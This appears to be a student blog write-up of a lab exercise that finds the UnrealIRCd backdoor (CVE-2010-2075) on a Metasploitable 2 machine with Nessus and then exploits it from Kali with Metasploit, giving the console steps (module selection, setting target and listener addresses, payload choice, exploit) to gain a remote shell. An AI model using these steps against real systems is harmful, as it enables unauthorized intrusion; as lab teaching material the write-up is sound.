top of page
Writer's pictureDevraj Khadka

Unreal IRCD Backdoor Detection


Unreal IRCd Backdoor Detection is an open-source IRC daemon and was originally from DreamForge. This vulnerability is available in Unix-like operating systems and windows.  It contains an introduced modification which is a Trojan Horse in DEBUG3_DOLOG_SYSTEM macro. This mainly allows remote attackers to perform arbitrary commands. The Vulnerability name is CVE 2010-2075.


Virtual Machine

Kali Linux

Metasploitable 2

Roles

Attacker

Target Machine

IP Configuration

IP Address: 192.168.2.67

IP Address:  192.168.2.78


This vulnerability can be exploited by the following :

a)      Firstly I login into the Nessus site and create a user and a password for finding the vulnerabilities in the listener system.


Note: Before logging into the Nessus, I perform the following commands in the KALI which is the attacker machine.

b)      After logging into the Nessus site, there are possible scan tools available for finding the vulnerability. Here I use the Basic Network Scan option.


c)      After clicking the Basic Network Scan the following option arrives where I have to enter Name, Target (192.168.2.78 which is the target IP machine). Then I clicked on the Save option.


d)      Then the following screen appears which is Vulnerability Finding the name at the Basic Network Scan.

e) After this clicking into the Launch icon at the top right corner of the site.

f)      After this the scanner runs in the system which will take some time depending on the system and the number of vulnerabilities found in the system.

 

g)      After the scan is completed, the number of vulnerabilities found in the system are displayed.


h)      Among all the vulnerabilities found in the system, I choose UnrealIRCd Backdoor detection vulnerability for the assignment. I clicked into this vulnerability and the following screenshot is displayed showing its description, remedies information.


i) After the above process is finished, not it’s time for attacking the listener machine. For this, I type the msfconsole in the terminal of the kali machine. Here msfconsole is the command for opening the Metasploit which helps in penetration testing and IDS signature development.

j) Then I type for search unreal for finding the unreal_ircd_3281_backdoor vulnerability.



k) Then I type use 2 command for using the exploit/unix/irc/unreal_ircd_3281_backdoor

l) Then I type show options command for showing all the options that I have to enter in the fields.

m) After this, I enter the set RHOSTS 192.168.2.78. Here RHOSTS means Remote Hosts where we should have to enter the target machine IP address.

n) Then I have to enter the payload option which can be found by entering the show payloads command. It shows the possible payload option that can be used. I used the command set payload 5.

o) After this, I entered show options again for finding the necessary options to be entered. Then I entered the set LHOSTS 192.168.2.67 command. Here LHOSTS is the listening hosts option which is the attacker machine IP address.

p) After all the options have been entered, finally I can exploit this vulnerability by writing the command exploit.

q) For determining whether the system can be exploited now or not, I simply write the command IP a which shows 192.168.2.78 which is exactly the victim machine IP address.


52 views0 comments

Recent Posts

See All

Battle of the Backends: Java vs Node.js

Comparing Java and Node.js involves contrasting two distinct platforms commonly used in backend development. Here’s a breakdown of their...

Comments


bottom of page